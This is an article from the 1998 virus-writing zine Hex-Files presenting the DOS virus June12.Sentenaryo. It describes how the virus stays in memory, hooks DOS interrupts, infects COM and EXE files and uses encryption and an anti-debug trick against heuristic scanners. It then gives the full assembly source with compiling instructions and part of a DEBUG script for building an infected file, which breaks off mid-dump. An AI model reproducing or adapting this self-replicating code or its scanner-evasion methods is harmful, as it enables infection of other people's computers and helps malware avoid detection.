Copy Link
Add to Bookmark
Report

Hexfiles Issue 3 File 010

eZine's profile picture
Published in 
hexfiles
 · 2 months ago

  
HEX-FILES No. 3 File 010
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

Virus Name : June12.Sentenaryo
Modified by: Putoksa Kawayan
Origin : Manila, Philippines
Date : May 1998


Da Background
~~~~~~~~~~~~~
Last year, I had these idea of writing a virus to mark the 100th year
of the Declaration of Independence of the Philippines -- a
commemorative virus. :) But I kept on putting it off, got bitten by
the "ma¤ana" habit. I was frantic when I realized that Da Day, June
12, is just around the corner and i still got zilch.

While preparing the disassembly of June12 family for this issue, I
realized that what anyone could ask for in coming up with a
centennial virus is already there. It got the national anthem and the
national flag. What it needs is a message appropriate for the
occasion. And, that's the easiest part -- look into yourself and say
what you feel and believe in.

My thanks goes to the author of the original June12, the most
nationalistic virus ever to come out of this 100-year old republic.
Whoever you are, mabuhay ka kapatid.


Da Virus
~~~~~~~~
June12.Sentenaryo is based on June12.Standard.2660, that is, I used
this variant as a shell in creating Sentenaryo. I chopped codes here
and added some there to create an 1898-byte virus. (1898 being the
year Philippine Independence was declared.) I tried to preserve the
"look and feel" of the original and, as much as possible, use the
original codes. However, if you are going to make changes, it's going
to show somewhere, somehow.

It goes memory resident reserving 4144 bytes of memory. Considering
its length, Sentenaryo requires more memory than the original. This
is because it already reserved the memory required for infection
unlike the original which allocates it when neccessary.

It hooks Int 21 and infection is triggered on read-only file open
(21/3d00) and program execution (21/4b00). Calls for get system date
(21/2a) are also screened for the content of DX, which serves as the
virus "are you there?" call. If DX contains 1998, the call is
returned with 1898 in DX. This is the reverse of what Kontragapi
does.

Just like the original virus, it infects COMs and EXEs with the
exception of COMMAND.COM. Its infective length is 1898 to 1913 bytes
in EXEs and 1909 to 1924 bytes in COM. The virus is appended to files
in all cases. However, the way COMs are infected was changed. The
original shifts the host by 11 bytes while Sentenaryo overwrites the
first 10 bytes of the host but saves the overwritten portion.

Even if the original virus is encrypted, it is not entirely
encrypted. On the other hand, Sentenaryo is fully encrypted save for
the decryptor and the anti-debug routine. This anti-debugging routine
is from the original but is placed where its effectiveness could be
maximized against heuristic scanners -- the virus entry point. This
made AVP and F-Prot look like the lamest AVs out there. However,
Thunderbyte got wise to it and its flags lighted up the screen. This
doesn't mean that Thunderbyte can't be blinded but I would go over
1898 bytes (even if I simplified the payload text, stripped off
unnecessary codes and remove my name) if I went for it. Anyway, I did
not intend this to be anti-heuristics but only put to good use what
is already in existence.

Aside from the payload text, you will find a text attributing this
variant to me:

"Isinaayos ni Putoksa Kawayan"

which translates to "Arranged by Putoksa Kawayan" but was intended to
mean "Modified by Putoksa Kawayan".


Da Payload
~~~~~~~~~~
The payload is triggered on June 12th when a program is executed. On
that day, all program executions are preceded by the display of the
Philippine National Flag and messages, and a rendition of the
Philippine National Anthem.

The messages in the original virus were changed to:


" M A B U H A Y

Republika ng Pilipinas
1898 * Ika-12 ng Hunyo * 1998

Kalayaan * ISANG DAANG TAON * Kasarinlan"

The text are in the colors of the Philippine flag -- red, white, blue
(both normal and bright/light text mode shades) and yellow. In
addition, "M A B U H A Y" and "ISANG DAANG TAON" are blinking. You
will find the translation of this message near the end of HEXFILE3.000.

A question, in red, appears below the flag:

" Kapatid, anong nagawa mo para sa bayan?"

"Kapatid" is a genderless word meaning brother or sister depending on
who you are addressing it to. The rest of the question is addressed
to my fellow Filipinos who should think about this remark, not only
in this Centennial year, but for the rest of our lives.

For non-Filipinos who want to know what this question means, please
ask a Filipino you know to translate this for you. Then ask him what
his/her answer to the question is?




Aling pag-ibig pa ang hihigit kaya
kaysa pag-ibig sa tinubuang lupa
-- Andres Bonifacio



ÄÄ J12SENT.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄ Virus Name: June12.Sentenaryo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄ Lamer : Putoksa Kawayan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄ Origin : Manila, Philippines ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄ Date : May 1998 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This source code can be compiled using ÄÄ
;ÄÄÄÄÄ COMPILING ÄÄÄÄÄÄÄÄÄÄÄÄ A86 4.02, TASM 2.01 or MASM 5.0. ÄÄ
;ÄÄÄÄÄ INSTRUCTION ÄÄÄÄÄÄÄÄÄÄÄÄ TASM and MASM produces the same output ÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ (variant A). A86 produces a somewhat ÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ different output (variant B). ÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Compile to EXE. ÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

dta struc
DriveCode db ? ;< do not touch this ;; this is ;;
MaskFileName db 8 dup (?) ;< portion if you are ;; documented ;;
MaskFileExt db 3 dup (?) ;< going to search for ;; as reseved ;;
RestOfReserved db 9 dup (?) ;< another file!!! ;; for DOS ;;
FileAttribute db ?
FileTime dw ?
FileDate dw ?
FileLengthLow dw ?
FileLengthHigh dw ?
FileName db 2 dup (?)
FileNameMM db 6 dup (?)
ExtCommand db 4 dup (?)
EndDta db ?
dta ends

ExeHeader struc
ExeID dw ?
PageMod dw ?
PageCount dw ?
RelTab dw ?
HedSize dw ?
MinPara dw ?
MaxPara dw ?
SSeg dw ?
SPt dw ?
CxSum dw ?
CPt dw ?
CSeg dw ?
ExeHeader ends

.286
Sentenaryo segment 'code'
assume cs:Sentenaryo, ds:Sentenaryo

blue equ 1
red equ 4
white equ 7
ltblue equ 9
ltred equ 12
yellow equ 14
btwhite equ 15
blink equ 80h

Environment equ 2ch
MotorTimeOut equ 440h
TimerTick equ 46ch

TraceTrap equ (offset NoTrace-Offset AntiTrace)-2
VirusJumperLen equ offset isErr-offset VirusJumper
MemRequired equ ((offset FirstGeneration-offset ThisIsSentenaryo)/16)+17
VirusStack equ ((MemRequired-16)*16)

org 0
ThisIsSentenaryo: ;-- you can remove this I retained it because I dont
; want to mess up this prog when I move something
;
; Payload Data: Other than PayloadText, payload data came from the
; original virus except that they were moved around.
; I made sure that word-sized data are even aligned
;
Anthem01 dw offset Anthem05,offset Anthem05,offset Anthem04
dw offset Anthem04,offset Anthem06,offset Anthem03
dw offset Anthem06,offset Anthem03

Anthem02 dw offset Anthem09,offset Anthem09,offset Anthem08
dw offset Anthem08,offset Anthem10,offset Anthem07
dw offset Anthem11,offset Anthem07
;
; Format --> high byte: number of times character is displayed
; of low byte: character to display
; FlagData -1: end of flag data for row
;
FlagData dw 0220h,02dfh,2020h,-1
dw 0220h,012ah,0320h,02dfh,1c20h,-1
dw 0a20h,02dfh,1820h,-1
dw 0520h,015ch,01b3h,012fh,0620h,02dfh,1420h,-1
dw 0420h,01c4h,01c4h,010fh,01c4h,01c4h,0520h
dw 012ah,0320h,12dfh,-1
dw 0520h,012fh,01b3h,015ch,0620h,02dch,1420h,-1
dw 0a20h,02dch,1820h,-1
dw 0220h,012ah,0320h,02dch,1c20h,-1
dw 0220h,02dch,2020h,-1

Anthem03 dw 0d5bh,0e21h,0be4h,0d5bh,11cah,0be4h,0a98h,0a00h
dw 0a98h,0be4h,0a98h,0d5bh,0d5bh,0e21h,0be4h,0d5bh
dw 11cah,0be4h,0a98h,0a00h,0a98h,0be4h,002ch

Anthem04 dw 0d5bh,0e21h,0d5bh,0be4h,0be4h,11cah,11cah,0be4h
dw 0be4h,11cah,11cah,0a98h,096fh,08e9h,07f1h,08e9h
dw 0d5bh,0e21h,0d5bh,0be4h,0be4h,11cah,11cah,0be4h
dw 0be4h,11cah,11cah,0a98h,0a00h,0a98h,0be4h,0a98h
dw 0be4h,0d5bh,002ch

Anthem05 dw 0d5bh,0fdah,0d5bh,0a00h,0a00h,08e9h,08e9h,07f1h
dw 08e9h,0a00h,08e9h,07f1h,077eh,07f1h,08e9h,07f1h
dw 0a00h,08e9h,0a98h,0a98h,0a00h,002ch

Anthem06 dw 0d5bh,002ch
;
; Format: # [,cd,co] ,string ,0 [,0]
;
; # - char count of string to display (excluding delimeters)
; cd - set color flag (blink = sign bit set)
; co - color (blink = set blink attribute)
; string - string to display
; 0 - end of data for line, if 0,0 - end of text block
;
PayloadText db 13,blink,blue or blink,'M A B U H A Y',0
db 1,' ',0 ;------ skip one row
db 22,blink,yellow,'Republika ng Pilipinas',0
db 29,blink,ltblue,'1898 ',blink,yellow,'* ',blink
db btwhite,'Ika-12 ng Hunyo ',blink,yellow,'*'
db blink,ltred,' 1998',0
db 1,' ',0 ;------ skip one row
db 44,blink,yellow,'Kalayaan',blink,white,' * '
db blink,ltred or blink,'ISANG ',blink
db btwhite or blink,'DAANG ',blink,ltblue or blink
db 'TAON',blink,white,' * ',blink,yellow
db 'Kasarinlan'
db 0,0
db 39,blink,red,'Kapatid, anong nagawa mo para sa bayan?'
db 0,0

FlagColor db 70h,71h,10h,70h,7eh,70h,71h,10h,70h,71h,10h,70h,7eh
db 7eh,7eh,70h,71h,10h,70h,7eh,7eh,7eh,7eh,7eh,70h,7eh
db 70h,41h,70h,7eh,7eh,7eh,70h,74h,40h,70h,74h,40h,70h
db 7eh,70h,74h,40h,70h,74h,40h

Anthem07 db 12,9,3,12,12,4,4,4,9,3,12,12,12,9,3,12,12,4,4,4,9,3

Anthem08 db 4,4,4,9,3,9,3,9,3,9,3,9,3,9,3,12,4,4,4,9,3,9,3,9
db 3,9,3,4,4,4,4,4,4,12

Anthem09 db 4,4,4,12,12,12,12,9,3,9,3,12,4,4,4,12,12,12,9,3,36

Anthem10 db 12

Anthem11 db 24
;
; Decrypt virus executable code. Structure of decryptor retained
; from original virus.
;
MaskInit:
push ds
push cs
pop ds
mov si,offset Init
mov bp,((offset EndOfSentenaryo-offset ThisIsSentenaryo)+VirusJumperLen)
InitLop:mov al,[si]
IniMask:xor al,0
mov [si],al
inc si
cmp si,bp
InfChk: jne InitLop
pop ds
ret
;
; This will blind F-Prot's heuristic scanner. I initially placed this
; under encrytion but when F-Prot detected the decryptor, I decided to
; place it in the open. Other heuristic scanners are also affected.
;
; Thunderbyte will be raising its heuristic flags. I could do something
; about this, other than the encryption of course, but I would go over
; 1898 bytes and I wouldn't want to do that.
;
; This was retained from the original virus.
;
SentenaryoEntry:
sub byte ptr cs:AntiTrace+1,TraceTrap
AntiTrace:
jmp short NoTrace
mov ah,4ch
int 21h

NoTrace:call MaskInit
;
; Code encryption starts here
;
Init: cld
mov dx,1998h ; memory self recognition
mov ah,2ah ; get system date
int 21h
cmp dx,1898h
jne NotResident
FileTyp:mov al,0 ; host type flag: 0 = com <>0 = exe
or al,al
jnz HostIsExe
push es ; restore and execute host com
push cs
pop ds
mov di,100h
push di
push es
mov si,offset EndOfSentenaryo
mov cx,VirusJumperLen
repe movsb
pop ds
retf

HostIsExe:
mov ax,es ; restore segments and pointers of host exe
add ax,16 ; and execute host
ExeSs: mov bx,0
add bx,ax
mov ss,bx
ExeSp: mov sp,0
ExeCs: add ax,1234h
push ax
ExeIp: mov ax,0
push ax
retf

NotResident:
push cs
pop ds
push cs
pop ss
mov sp,VirusStack
mov ax,es
xor si,si
mov byte ptr AntiTrace+1,TraceTrap
mov bx,offset EndOfSentenaryo
mov byte ptr [bx],0f3h
mov [Psp],ax
mov [Psp2],ax
mov [Psp3],ax
add ax,16
mov es,ax
mov cx,((offset EndOfSentenaryo-offset ThisIsSentenaryo)/2)+1
mov di,si
mov word ptr [bx+1],0cba5h
push es
push offset ContinueInit
jmp bx ; move virus to Psp:100

ExecParam dw ?,80h
Psp dw ?,5ch
Psp2 dw ?,6ch
Psp3 dw ?

ContinueInit:
mov ax,cs
mov ss,ax
mov ds,ax
mov ax,3521h ; save and hook int 21
int 21h
mov word ptr DosInterrupt,bx
mov word ptr DosInterrupt+2,es
mov dx,offset isDos
mov ah,25h
int 21h
mov bx,MemRequired ; release extra mem
mov ah,4ah
mov es,Psp
int 21h
xor di,di
mov bx,offset ExecParam
mov ax,es:Environment[di]
mov [bx],ax
mov es,ax
mov cx,7fffh ; get host file name from
mov ax,di ; environment segment
FindFilename:
repne scasb
scasb
jne FindFilename
scasw
mov dx,di
mov ah,4bh
push es
pop ds
push cs ; execute host
pop es
pushf
call dword ptr cs:DosInterrupt
push cs
pop ss
mov sp,VirusStack
mov ah,4dh ; get return code...
int 21h
push ax ; ...and save
mov es,cs:ExecParam
mov ah,49h ; release environment segment
int 21h
pop ax ; retrieve return code
mov ah,31h
mov dx,MemRequired ; tsr
int 21h

MaskData: ; encrypt/decrypt payload data
push ax
push si
xor si,si
MaskDat:mov ah,9ch
DataLop:mov al,[si]
xor al,ah
mov [si],al
inc si
cmp si,offset MaskInit
jne DataLop
pop si
pop ax
ret

isTheDay:
pusha
mov ah,2ah ; get system date
int 21h
cmp dx,60ch ; is it June 12th?
jne IsNot
push ds ; ...if so, then show payload
push es
push cs
pop ds
call ShowPayload
pop es
pop ds
IsNot: popa
ret
;
;------------------------------ int 21 handler
;
isDos: pushf
cmp ah,2ah ; get system date = self rec
je isSelfRecMem
cmp ax,4b00h ; exec
je SetUpForInfection
cmp ah,3dh ; file open
je SetUpForInfection
PassToDos:
popf
db 0eah
DosInterrupt dd ?

isSelfRecMem:
cmp dx,1998h ; verify if call is self rec
jne PassToDos ; if no, execute function
mov dh,18h ; else, return sel_rec_id
popf
iret

SetUpForInfection:
pusha
push ds
push es
call MaskHandler ; decrypt infection routine
MaskHandlerStart:
cld
mov ah,2fh ; save active dta
int 21h
push bx
push es
push dx
push ds
push cs
pop ds
mov dx,offset MyDta ; set up our own
mov ah,1ah
int 21h
mov si,dx
pop ds
pop dx
mov ah,4eh ; load to dta data of file
mov cx,27h
int 21h
pop ds
pop dx
mov ah,1ah ; restore saved dta
int 21h
push cs
pop ds ; get drive number from dta
mov al,[si]
mov dl,al
add al,'A'-1 ; convert to drive letter
mov ah,':'
mov word ptr Caller,ax ; init asciiz
mov ah,36h
int 21h
jc HopToEnd

DetermineFreeSpace:
mul bx
mul cx
or dx,dx
jnz EnoughDiskSpace
cmp ax,((offset EndOfSentenaryo-offset ThisIsSentenaryo)+VirusJumperLen)
jb HopToEnd
EnoughDiskSpace:
push cs
pop es
mov cx,3
lea di,MaskFileExt[si]
mov si,offset Command
mov byte ptr FileTyp+1,ch
push cx
push si
push di
repe cmpsb ; is file com?
pop di
pop si
pop cx
jne CheckIfExe ; no, then check if it is exe
add cl,4 ; else, check if command.com
sub di,cx ; we won't infect command.com
dec di
repe cmpsb
jne PrepareToInfect
HopToEnd:
jmp NoErrorRestore

AlterBy db 'Isinaayos ni ' ; I include this text to make the virus
WhoIsMe db 'Putoksa Kawayan' ; length 1898 bytes. I'll go over this
; if I instead add add other things

CheckIfExe:
mov si,offset Exe ; is file exe?
repe cmpsb
jne HopToEnd
PrepareToInfect:
mov si,offset MyDta.FileName
mov di,offset CallerName
mov cl,13 ; copy file name to our asciiz
repe movsb
mov ax,3524h ; save and hook int 24
int 21h
mov ah,25h
mov dx,offset isErr
push es
push bx
push ax
int 21h
push cs
pop es
mov dx,offset Caller ; clear file attribute
xor cx,cx
mov ax,4301h
int 21h
jnc OpenFile
HopToErr:
jmp RestoreErrorInterrupt

Command db 'COMMAND'
Exe db 'EXE'

OpenFile:
mov ax,3d02h ; open file
pushf
call dword ptr cs:DosInterrupt
jc HopToErr
xchg bx,ax
mov cx,-1
mov dx,-((offset EndOfSentenaryo-offset InfChk)+VirusJumperLen)
mov ax,4202h
int 21h
jnc ReadForCheck ; set file pointer to where virus'
HopToClose: ; unencrypted code is supposed to be
jmp CloseFile

MaskForInfection:
push si
call MaskData ; decrypt payload data
xor ah,ah
int 1ah
xchg ax,dx
or al,1 ; make sure we wont get a zero
mov byte ptr ds:IniMask+1,al ; set virus init encryption mask
mov dl,al
add al,ah
or al,1 ; make sure we wont get a zero
mov byte ptr ds:MaskDat+1,al ; set payload data encryption mask
xor al,ah
or al,1 ; make sure we wont get a zero
mov byte ptr ds:HanMask+1,al ; set int handler encryption mask
mov dh,al
call MaskData ; encrypt payload data with new mask
mov di,offset EncryptBuff
push di ; copy virus to encryption buffer
xor si,si
mov cx,offset EndOfSentenaryo
repe movsb
mov si,(offset EncryptBuff+(offset MaskHandlerStart-offset ThisIsSentenaryo))
mov bp,(offset EncryptBuff+(offset MaskHandlerEnd-offset ThisIsSentenaryo))
Inf1Lop:mov al,[si]
xor al,dh ; encrypt int handler
mov [si],al
inc si
cmp si,bp
jne Inf1Lop
mov si,(offset EncryptBuff+(offset Init-offset ThisIsSentenaryo))
mov bp,(offset EncryptBuff+(offset EndOfSentenaryo-offset ThisIsSentenaryo))
cmp byte ptr FileTyp+1,0
jne Inf2Lop
add bp,10 ;--- VirusJumperLen, take note when modifying
Inf2Lop:mov al,[si] ; encrypt rest of virus
xor al,dl
mov [si],al
inc si
cmp si,bp
jne Inf2Lop
pop di
pop si
ret

ReadForCheck:
mov cx,((offset Init-offset InfChk)+VirusJumperLen)
mov dx,offset EncryptBuff
mov ah,3fh ; read for infection check
int 21h
jc HopToClose
mov cx,(offset Init-offset InfChk)
mov di,dx
mov si,offset InfChk
push cx
push si
push di
repe cmpsb ; check for com infection
pop di
pop si
pop cx
SkipHopToClose:
je HopToClose
add di,10 ;--- VirusJumperLen, take note when modifying
repe cmpsb
je SkipHopToClose ; check for exe infection
NotInfected:
call MovePointerStart
mov cl,28
mov dx,offset ReadBuffer ; read start of file
mov ah,3fh
int 21h
mov si,dx
mov di,16
mov ax,'ZM' ; is it exe?
cmp [si],ax
je isExe
;
;------------------------------------------- com infection
;
mov ax,MyDta.FileLengthLow
and al,0f0h
add ax,di ; align length to para
push ax
shr ax,4 ; and convert to segment
add ax,di
mov word ptr ds:VirSeg+1,ax ; set virus segment
call MaskForInfection ; encrypt
pop dx
call MovePointerCom ; move pointer to eof
mov dx,di
mov cx,((offset EndOfSentenaryo-offset ThisIsSentenaryo)+VirusJumperLen)
mov ah,40h
int 21h ; write encrypted virus
jc HopToTimeDate
call MovePointerStart ; move pointer to start of file
mov cx,VirusJumperLen
mov dx,offset VirusJumper
mov ah,40h ; write jump to virus
int 21h
HopToTimeDate:
jmp SetTimeDate ; clean up things

VirusJumper:
mov ax,cs
VirSeg: add ax,0
push ax
push offset SentenaryoEntry
retf

isErr: mov al,0 ; int 24 handler
iret

MovePointerStart:
xor dx,dx
MovePointerCom:
xor cx,cx
MovePointer:
mov ax,4200h
int 21h
ret
;
;------------------------------------------- exe infection
;
isExe: mov byte ptr FileTyp+1,al ; set file type flag
xor cx,cx
mov bp,512
mov ax,SSeg[si] ; save header segments and pointers
mov word ptr ExeSs+1,ax
mov ax,SPt[si]
mov word ptr ExeSp+1,ax
mov ax,CPt[si]
mov word ptr ExeIp+1,ax
mov ax,CSeg[si]
mov word ptr ExeCs+1,ax
mov ax,PageCount[si] ; get file size from header
cmp PageMod[si],cx ; this will lead to problems
je PageAligned ; if file has internal overlay
dec ax
PageAligned:
mul bp
add ax,PageMod[si]
adc dx,cx ; align to para
dec di
add ax,di
adc dx,cx
inc di
and al,0f0h
push ax
push dx
add ax,offset EndOfSentenaryo
adc dx,cx
div bp
or dx,dx
jz AlignedToPage
inc ax
AlignedToPage:
mov PageCount[si],ax ; set infected header entries
mov PageMod[si],dx
pop dx
pop ax
push ax
push dx
div di
sub ax,HedSize[si]
mov CSeg[si],ax
mov CPt[si],offset SentenaryoEntry
add ax,(offset EndOfSentenaryo-ThisIsSentenaryo)/16
mov SSeg[si],ax ;/-------- this will suppress thunderbyte's
mov SPt[si],bp ;\-------- "inconsistent exe-header" flag
call MaskForInfection ; encrypt virus
pop cx
pop dx
call MovePointer ; move pointer to eof
mov dx,di
mov cx,offset EndOfSentenaryo
mov ah,40h
int 21h ; write encrypted virus
jc SetTimeDate
call MovePointerStart ; move pointer to start of file
mov cl,28
mov dx,si
mov ah,40h ; write infected exe header
int 21h
SetTimeDate:
mov ax,5700h ; preserve file time/date stamp
int 21h
inc ax
int 21h
CloseFile:
mov ah,3eh ; close file
int 21h
xor ch,ch
mov cl,ds:MyDta.FileAttribute
mov dx,offset Caller
mov ax,4301h ; restore file attribute
int 21h
RestoreErrorInterrupt:
pop ax
pop dx
pop ds
int 21h ; restore int 24
NoErrorRestore:
call MaskHandler ; encrypt int 21 handler
MaskHandlerEnd:
pop es
pop ds
popa
cmp ah,4bh ; is it exec?
jne NotExec
call isTheDay ; check if june 12th
NotExec:jmp PassToDos

ShowIt: push cx ; display char
mov cl,ah
mov ah,9
int 10h
pop cx
EndText:ret
; show payload text
ShoText:inc dh
lodsb
or al,al ; end of text block?
jz EndText
mov dl,80
sub dl,al
shr dl,1
mov ah,2 ; center text
int 10h
NxtChar:lodsb
or al,al
jz ShoText ; end of row?
jns ShoChar ; text color set flag?
lodsb
mov bl,al ; set color
jmp NxtChar
ShoChar:mov ah,1
call ShowIt ; show character
inc dl
mov ah,2 ; move cursor next column
int 10h
jmp NxtChar

ShowPayload:
mov ax,3 ; set video mode to 3
int 10h
push cs
pop ds
mov ah,3 ; get cursor size and save
xor bh,bh
int 10h
push cx
mov ah,1 ; hide cursor
mov cx,201h
int 10h
call MaskData ; decrypt payload data
sti
xor cx,cx ; show PayloadText
mov bh,cl
mov dh,bh
mov si,offset PayloadText
call ShoText
mov dh,19
call ShoText ; show second block of text

mov dx,916h ; draw flag
mov si,offset FlagData
mov di,offset FlagColor
mov cx,9
MoveCur:mov ah,2
int 10h
lodsw
cmp al,-1
je NextRow
add dl,ah
mov bl,[di]
call ShowIt
inc di
jmp MoveCur
NextRow:inc dh
mov dl,22
loop MoveCur

mov bx,0c350h ; play the anthem
mov al,bl
out 40h,al
mov al,bh
out 40h,al
in al,61h
push ax
mov cx,8
NxtNote:mov di,cx
dec di
shl di,1
mov si,[di]
mov di,[di+(Anthem02-Anthem01)]
push cx
call Player
pop cx
loop NxtNote
pop ax
out 61h,al
xor al,al
out 40h,al
out 40h,al
xor ax,ax
mov ds,ax
mov di,MotorTimeOut
mov byte ptr [di],1
xor bh,bh
xor dx,dx
mov ah,2
int 10h ; move cursor to upper left corner
cli
mov al,byte ptr ds:TimerTick
or al,1
push cs ; change payload data mask
pop ds ; this is not necessary but....
mov byte ptr MaskDat+1,al
call MaskData ; encrypt payload data
mov ax,700h
mov bh,ah
xor cx,cx
mov dx,184fh
int 10h ; clear screen
pop cx
mov ah,1
int 10h ; restore cursor
ret

Player: mov bx,[si]
mov al,0b6h
out 43h,al
mov ax,bx
out 42h,al
xchg ah,al
out 42h,al
in al,61h
or al,3
out 61h,al
mov cl,[di]
push ds
push si
xor ax,ax
mov ds,ax
mov si,MotorTimeOut
mov [si],cl
Tuner: cmp [si],al
jne Tuner
pop si
pop ds
add si,2
inc di
cmp byte ptr [si],2ch
jne Player
ret

MaskHandler: ; encrypt/decrypt int handler
push ds
push cs
pop ds
mov si,offset MaskHandlerStart
mov bp,offset MaskHandlerEnd
HanMask:mov ah,0
HandLop:mov al,[si]
xor al,ah
mov [si],al
inc si
cmp si,bp
jne HandLop
pop ds
ret

EndOfSentenaryo:

CallerAsciiz dd ?
EncryptBuff db (EndOfSentenaryo-ThisIsSentenaryo) dup (?)
ReadBuffer db (28-21) dup (?)
MyDta db 43 dup (?)
Caller db ?,?
CallerName db 13 dup (?)
;
; To simplify the next two lines, use "align 16" instead.
; But, a86 does not recognize the "align" directive.
;
LengthToHere equ $-ThisIsSentenaryo
ParaAlign db ((((LengthToHere+15)/16)*16)-LengthToHere) dup (?)

FirstGeneration:
mov ax,cs
mov ss,ax
mov sp,offset FirstGeneration
mov ds,ax
mov dx,1998h ; check if in memory
mov ah,2ah
int 21h
cmp dx,1898h
jne Pers2
call Pers1 ; beep three times if yes
call Pers1
call Pers1
mov ax,4cffh ; terminate
int 21h
even
Pers1: mov ax,0e07h ; beeper
xor bx,bx
int 10h
ret
even
Pers2: xor ax,ax ; set encryption mask
mov ds,ax
mov ax,ds:TimerTick
or ax,101h
mov byte ptr cs:HanMask+1,al
mov byte ptr cs:MaskDat+1,ah
push cs
pop ds
call MaskHandler ; encrypt int handler
call MaskData ; encrypt payload data
mov ax,es:Environment
mov es,ax
mov ah,49h ; release environment segment
int 21h
mov ax,3521h ; save and hook int 21
int 21h
mov word ptr DosInterrupt,bx
mov word ptr DosInterrupt+2,es
mov dx,offset isDos
mov ax,2521h
int 21h
call Pers1 ; beep once
mov ax,3100h
mov dx,MemRequired
int 21h ; tsr

Sentenaryo ends

end FirstGeneration

ÄÄ J12SENT.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



The virus in this infected file was compiled in TASM 2.01.


ÄÄ J12SENTA.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N J12SENTA.COM
E 0100 8C C8 05 2F 00 50 68 88 02 CB 61 62 75 68 61 79
E 0110 21 0D 0A 0A 54 68 69 73 20 69 73 20 4A 75 6E 65
E 0120 31 32 2E 53 65 6E 74 65 6E 61 72 79 6F 2E 31 38
E 0130 39 38 2E 41 20 76 69 72 75 73 20 63 6F 6D 69 6E
E 0140 67 20 74 6F 20 79 6F 75 20 66 72 6F 6D 20 74 68
E 0150 65 20 50 68 69 6C 69 70 70 69 6E 65 73 2E 0D 0A
E 0160 42 72 6F 75 67 68 74 20 74 6F 20 79 6F 75 20 6C
E 0170 69 76 65 20 62 79 20 48 45 58 2D 46 49 4C 45 53
E 0180 20 4E 6F 2E 20 33 0D 0A 0A 48 45 58 2D 46 49 4C
E 0190 45 53 20 61 6E 64 20 50 75 74 6F 6B 73 61 20 4B
E 01A0 61 77 61 79 61 6E 20 61 72 65 20 6E 6F 74 20 72
E 01B0 65 73 70 6F 6E 73 69 62 6C 65 20 66 6F 72 20 61
E 01C0 63 74 75 61 6C 2C 20 69 6D 70 6C 69 65 64 0D 0A
E 01D0 61 6E 64 2F 6F 72 20 69 6D 61 67 69 6E 61 72 79
E 01E0 20 64 61 6D 61 67 65 20 61 72 69 73 69 6E 67 20
E 01F0 64 69 72 65 63 74 6C 79 20 6F 72 20 69 6E 64 69
E 0200 72 65 63 74 6C 79 20 66 72 6F 6D 20 74 68 65 20
E 0210 75 73 65 2C 20 6D 69 73 75 73 65 0D 0A 6F 72 20
E 0220 6E 6F 6E 2D 75 73 65 20 6F 66 20 74 68 69 73 20
E 0230 70 72 6F 67 72 61 6D 2E 20 54 68 65 20 70 65 72
E 0240 73 6F 6E 20 77 68 6F 20 65 78 65 63 75 74 65 73
